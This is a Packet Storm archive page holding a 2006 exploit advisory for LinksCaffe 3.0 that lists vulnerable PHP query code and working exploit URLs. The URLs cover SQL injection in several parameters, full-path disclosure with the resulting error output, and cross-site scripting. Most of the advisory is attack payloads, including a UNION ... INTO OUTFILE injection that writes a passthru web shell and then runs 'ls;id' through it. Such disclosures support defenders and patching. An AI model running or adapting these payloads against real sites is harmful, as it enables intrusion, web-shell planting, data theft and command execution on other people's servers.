what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LinksCaffe30.txt

LinksCaffe30.txt
Posted Jul 26, 2006
Authored by Simo64

LinksCaffe version 3.0 suffers from SQL injection and cross site scripting flaws.

tags | exploit, xss, sql injection
SHA-256 | abe6f567ea6ffa058462500b5a97341cdc184962ce92b8faf57c6baf2628ecec

LinksCaffe30.txt

Change Mirror Download
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

Produce : LinksCaffe 3.0
Website : http://gonafish.com/
Impact : manupulation of data / system access
Discovered by : Simo64 - Moroccan Security Team

[+] SQL injection
******************

[1]Vulnerable code in line 223 in links.php

code :

$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());

$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks

Exploit :

http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]

[2] Vulnerable code in line 516 in links.php

code :

if (!$newdays)
{
$newdays=$daysnew;
}
else
{
$newdays=$newdays;
}

$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());

Exploit :
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]


[3] Vulnerable code in line 516 in links.php

code :

if ($action=="deadlink")
{
........
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
while($row = mysql_fetch_array($rime)) {
extract($row);
echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";
echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>
<input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";
}

$link_id var are not sanitized before to be used to conducte sql injection attacks

Exploit :

http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]

[+] FullPath disclosure :

PoC :

http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*

Result :

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549

Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554

[+] Remote Command Execution
*****************************

if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!

Exploit :

http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*

after we can exec cmds

http://localhost/linkscaffe/pipo.php?cmd=ls;id



[+] Cross Site Scripting
*************************

$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks
$newdays var in links.php is not sanitized before to be used to conducte xss attacks
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks

PoC :

http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+

http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]

http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]



Contact : simo64@gmail.com

greetz to all friends !
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close